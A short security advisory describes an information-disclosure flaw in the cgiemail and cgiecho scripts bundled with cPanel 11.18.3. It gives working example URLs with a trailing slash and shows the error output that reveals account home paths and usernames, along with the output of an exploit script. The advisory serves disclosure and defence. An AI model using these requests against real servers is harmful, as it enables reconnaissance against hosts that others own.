cPanel 11.18.3-cPanel_get_username - remote users could obtain the username associated with a cPanel account



DESCRIPTION


Not a cPanel issue directly, but an issue with a 3rd party software installed by default on cPanel servers. The cgiemail application comes with 2 scripts: cgiemail and cgiecho. By default, they were placed in /home/username/public_html/cgi-bin/ when a new account was created. They also exist globally in /usr/local/cpanel/cgi-sys/ by default. Sending a request to either of those files with a "/" appended to the request would reveal the username associated with the account.


[user@host ~]$ ./11.18.3-STABLE_21703-cgiemail_get_cPanel_username.pl attacker.net
/home/xxxxx/public_html/


cgiemail:

http://example.com/cgi-bin/cgiemail/
http://example.com/cgi-sys/cgiemail/
Error
No email was sent due to an error.

500 Empty template file

/home/example/public_html/index.html

cgiemail 1.6 


cgiecho:

http://example.com/cgi-bin/cgiecho/
http://example.com/cgi-sys/cgiecho/
Error
Form was not processed due to an error.

500 Empty template file

/home/example/public_html/index.html

cgiemail 1.6 


Note that /cgi-sys/ is ScriptAlias'd in httpd.conf:

ScriptAlias /cgi-sys /usr/local/cpanel/cgi-sys/



IMPACT


Remote users could obtain the cPanel username associated with a domain. This issue still exists in the cgiemail package. cPanel's patch for it can be found in the patch located here: /usr/local/cpanel/src/3rdparty/mit/patches/cgiemail-1.6.patch and here.